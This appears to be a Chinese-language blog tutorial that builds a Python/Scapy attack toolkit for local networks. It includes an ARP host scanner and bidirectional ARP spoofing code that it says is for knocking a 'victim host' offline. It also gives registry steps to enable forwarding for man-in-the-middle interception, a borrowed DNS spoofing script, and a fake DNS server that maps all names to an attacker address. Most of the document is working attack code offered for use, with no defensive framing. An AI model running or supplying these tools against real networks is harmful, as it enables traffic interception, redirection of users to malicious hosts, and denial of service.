pythonarp工具_Python 实现ARP扫描欺骗工具

实现简单的ARP扫描工具: 传入扫描参数main.py -a 192.168.1.1-100 扫描网段内所有的在线主机并显示其MAC地址.

from scapy.all import *

from optparse import OptionParser

import threading

def parse_ip(targets):

_split = targets.split('-')

first_ip = _split[0]

ip_split = first_ip.split('.')

ipv4 = range(int(ip_split[3]),int(_split[1])+1)

addr = [ ip_split[0]+'.'+ip_split[1]+'.'+ip_split[2]+'.'+str(p) for p in ipv4 ]

return addr

def arp_scan(address):

try:

ret = sr1(ARP(pdst=address),timeout=5,verbose=False)

if ret:

if ret.haslayer('ARP') and ret.fields['op'] == 2:

print('[+] IP地址: {} => MAC地址:{}'.format(ret.fields['psrc'],ret.fields['hwsrc']))

except Exception:

exit(1)

if __name__ == "__main__":

parser = OptionParser()

parser.add_option("-a","--addr",dest="address",help="--> input 192.168.1.0-100")

(options,args) = parser.parse_args()

if options.address:

addr_list = parse_ip(options.address)

for item in addr_list:

threads = []

t = threading.Thread(target=arp_scan,args=(item,))

threads.append(t)

t.start()

for item in threads:

item.join()

else:

parser.print_help()

简单的ARP双向欺骗: 可以使用route -4 print 获取本地机器的网卡名称

from scapy.all import *

from optparse import OptionParser

import threading

# 生成ARP数据包，伪造网关欺骗目标计算机

def createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP):

pkt = Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2)

return pkt

# 生成ARP数据包，伪造目标计算机欺骗网关

def createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP):

pkt = Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2)

return pkt

interface = "Realtek PCIe GBE Family Controller" # 本地接口名称

gatewayIP = "192.168.1.1" # 本网段的网关地址

tgtIP = "192.168.1.3" # 目标计算机的IP(被欺骗计算机)

srcMac = get_if_hwaddr(interface) # 本机的MAC地址

tgtMac = getmacbyip(tgtIP) # 目标计算机的MAC地址

gatewayMac = getmacbyip(gatewayIP) # 网关的MAC地址

print("[+] 本机MAC: {} ---> 目标MAC: {} ---> 网关MAC: {}".format(srcMac,tgtMac,gatewayMac))

print("[+] 目标IP: {} ---> 网关IP: {}".format(tgtIP,gatewayIP))

pktstation = createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP)

pktgateway = createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP)

while True:

t = threading.Thread(target=sendp,args=(pktstation,),kwargs={'iface':interface})

t.start()

t.join()

s = threading.Thread(target=sendp,args=(pktgateway,),kwargs={'iface':interface})

s.start()

s.join()

合并起来吧，构成自己的ARP欺骗工具包

from scapy.all import *

from optparse import OptionParser

import threading,time

# 生成网段信息,例如输入: 192.168.1.1/20 生成1-20地址

def Parse_IP(targets):

_split = targets.split('/')

first_ip = _split[0]

ip_split = first_ip.split('.')

ipv4 = range(int(ip_split[3]),int(_split[1])+1)

addr = [ ip_split[0]+'.'+ip_split[1]+'.'+ip_split[2]+'.'+str(p) for p in ipv4 ]

return addr

# 通过ARP协议扫描局域网中在线的设备

def ARP_Scan(address):

try:

ret = sr1(ARP(pdst=address),timeout=5,verbose=False)

if ret:

if ret.haslayer('ARP') and ret.fields['op'] == 2:

print('[+] IP地址: %-13s ==> MAC地址: %-15s' %(ret.fields['psrc'],ret.fields['hwsrc']))

except Exception:

exit(1)

# 生成ARP数据包,伪造网关欺骗目标计算机

def createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP):

pkt = Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2)

return pkt

# 生成ARP数据包,伪造目标计算机欺骗网关

def createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP):

pkt = Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2)

return pkt

# 开启线程将数据包发送得到目标主机,使其拒绝服务,断网.

def BrokenNetwork(Interface,gatewayIP,tgtIP):

srcMac = get_if_hwaddr(Interface) # 通过接口名称获取本机MAC地址

tgtMac = getmacbyip(tgtIP) # 通过IP地址获取目标计算机的MAC地址

gatewayMac = getmacbyip(gatewayIP) # 指定本机网段的网关MAC地址

while True:

time.sleep(1)

pktstation = createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP)

pktgateway = createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP)

t = threading.Thread(target=sendp,args=(pktstation,),kwargs={'iface':Interface})

t.start()

t.join()

s = threading.Thread(target=sendp,args=(pktgateway,),kwargs={'iface':Interface})

s.start()

s.join()

if __name__ == "__main__":

parser = OptionParser()

parser.add_option("-s","--scan",dest="scan",help="输入一个扫描网段: 192.168.1.1/10")

parser.add_option("-i","--interface",dest="interface",help="输入接口名: Realtek PCIe GBE Family Controller")

parser.add_option("-g","--gateway",dest="gateway",help="输入网关地址: 192.168.1.1")

parser.add_option("-t","--target",dest="target",help="输入被害主机地址: 192.168.1.10")

(options,args) = parser.parse_args()

if options.scan:

addr_list = Parse_IP(options.scan)

for item in addr_list:

threads = []

t = threading.Thread(target=ARP_Scan,args=(item,))

threads.append(t)

t.start()

for item in threads:

item.join()

elif options.gateway and options.target and options.scan == None:

BrokenNetwork(options.interface,options.gateway,options.target)

else:

parser.print_help()

开启转发功能。开始运行里面输入regedit 打开注册表编辑器，在注册表定位下面注册表项

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/ Services/Tcpip/Parameters

选择下面的项目：IPEnableRouter:REG_DWORD:0x0 找到项目鼠标右键修改数值为1

关于欺骗，网上其他人的一种实现方法，代码如下，只不过我们只做了ARP骗，而在该欺骗基础上可以加强为DNS欺骗。

import sys

import os

import threading

from scapy.all import *

from optparse import OptionParser

#DNS欺骗函数

def DNS_Spoof(data):

if data.haslayer(DNS):

try:

#构造DNS AN数据

dns_an=DNSRR(rrname=data[DNS].qd.qname,rdata=jokers)

#构造IP/UDP数据包

repdata=IP(src=data[IP].dst,dst=data[IP].src)/UDP(dport=data[IP].sport,sport=53)

#构造DNS数据包

repdata/=DNS(id=data[DNS].id,qd=data[DNS].qd,qr=1,an=dns_an)

#攻击信息输出

print ('\nhancker ip :' + jokers + " url : "+data[DNS].qd.qname)

#发送数据包

send(repdata)

except Exception:

sys.exit(1)

#DNS欺骗函数

def DNS_S(dns_ip,iface):

global jokers

jokers=dns_ip

print ("DNS欺骗开始!")

sniff(prn=DNS_Spoof,filter='udp dst port 53',iface=iface)

#ARP欺骗函数

def op(eths,mubiao_ip,Ps,gateway_ip):

ip=mubiao_ip

wifi=gateway_ip

#目标设备MAC地址

dst_Mac=str(getmacbyip(ip))

#黑客设备mac地址

self_Mac=str(get_if_hwaddr(eths))

#网关MAC地址

wifi_Mac=str(getmacbyip(wifi))

#构造以太帧数据

Ether_data=Ether(src=self_Mac,dst=dst_Mac)/ARP(op=2,hwsrc=self_Mac,psrc=wifi,hwdst=dst_Mac,pdst=ip)

try:

#发送以太帧数据，sendp发送OSI模型中的二层数据

sendp(Ether_data,inter=2,iface=eths,loop=1)

except Exception as e:

print("目标ARP数据发送失败!")

def wifi(eths,mubiao_ip,gateway_ip,Ps,dns_ip):

ip=gateway_ip

dst=mubiao_ip

et = eths

#根据IP获取MAC

dst_Mac = getmacbyip(ip)

#根据网卡获取MAC

self_Mac = get_if_hwaddr(et)

Ether_data = None

if Ps=="1":

#构造以太帧数据与ARP响应数据，ARP协议源地址给一个不存在的MAC地址与正确的IP地址对应，实现双向的无法解析，ARP协议的op参数是状态，2为响应数据，1为请求数据

Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc='12:1a:13:a3:13:ef', psrc=dst, hwdst=dst_Mac, pdst=ip)

#新线程，开始DNS欺骗

t3 = threading.Thread(target=DNS_S, args=(dns_ip,eths))

t3.setDaemon(True)

t3.start()

if Ps == "0":

#构造以太帧数据与ARP响应数据，这里因为不需要DNS欺骗，所以不需要一个假的MAC地址，让双方通信设备正常访问即可

Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc=self_Mac, psrc=dst, hwdst=dst_Mac, pdst=ip)

if Ps!="1" and Ps!="0":

print (Ps)

print (type(Ps))

print ('-P 参数有误！')

sys.exit(1)

try:

sendp(Ether_data, inter=2,iface=et,loop=1)

except Exception as e:

print("网关ARP数据发送失败!")

def main():

try:

eth= "Realtek PCIe GBE Family Controller"

mubiao="192.168.1.6"

gateway="192.168.1.1"

P="0"

dip="8.8.8.8"

t1=threading.Thread(target=op,args=(eth,mubiao,P,gateway))

t1.setDaemon(True)

t1.start()

t2=threading.Thread(target=wifi,args=(eth,mubiao,gateway,P,dip))

t2.setDaemon(True)

t2.start()

except Exception as e:

print (e)

sys.exit(1)

while True:

pass

if __name__ == '__main__':

main()

DNS欺骗需要一个DNS解析服务器，这里从网上找到一个DNS解析服务器代码，可以快速解析。

import socketserver,struct

class SinDNSQuery:

def __init__(self, data):

i = 1

self.name = ''

while True:

d = data[i]

if d == 0:

break;

if d < 32:

self.name = self.name + '.'

else:

self.name = self.name + chr(d)

i = i + 1

self.querybytes = data[0:i + 1]

(self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])

self.len = i + 5

def getbytes(self):

return self.querybytes + struct.pack('>HH', self.type, self.classify)

class SinDNSAnswer:

def __init__(self, ip):

self.name = 49164

self.type = 1

self.classify = 1

self.timetolive = 190

self.datalength = 4

self.ip = ip

def getbytes(self):

res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)

s = self.ip.split('.')

res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))

return res

class SinDNSFrame:

def __init__(self, data):

(self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])

self.query = SinDNSQuery(data[12:])

def getname(self):

return self.query.name

def setip(self, ip):

self.answer = SinDNSAnswer(ip)

self.answers = 1

self.flags = 33152

def getbytes(self):

res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)

res = res + self.query.getbytes()

if self.answers != 0:

res = res + self.answer.getbytes()

return res

class SinDNSUDPHandler(socketserver.BaseRequestHandler):

def handle(self):

data = self.request[0].strip()

dns = SinDNSFrame(data)

socket = self.request[1]

namemap = SinDNSServer.namemap

if(dns.query.type==1):

name = dns.getname();

if namemap.__contains__(name):

dns.setip(namemap[name])

socket.sendto(dns.getbytes(), self.client_address)

elif namemap.__contains__('*'):

dns.setip(namemap['*'])

socket.sendto(dns.getbytes(), self.client_address)

else:

socket.sendto(data, self.client_address)

else:

socket.sendto(data, self.client_address)

class SinDNSServer:

def __init__(self, port=53):

SinDNSServer.namemap = {}

self.port = port

def addname(self, name, ip):

SinDNSServer.namemap[name] = ip

def start(self):

HOST, PORT = "0.0.0.0", self.port

server = socketserver.UDPServer((HOST, PORT), SinDNSUDPHandler)

server.serve_forever()

if __name__ == "__main__":

server = SinDNSServer()

server.addname('www.lyshark.com', '192.168.1.1')

server.addname('*', '192.168.1.2')

server.start()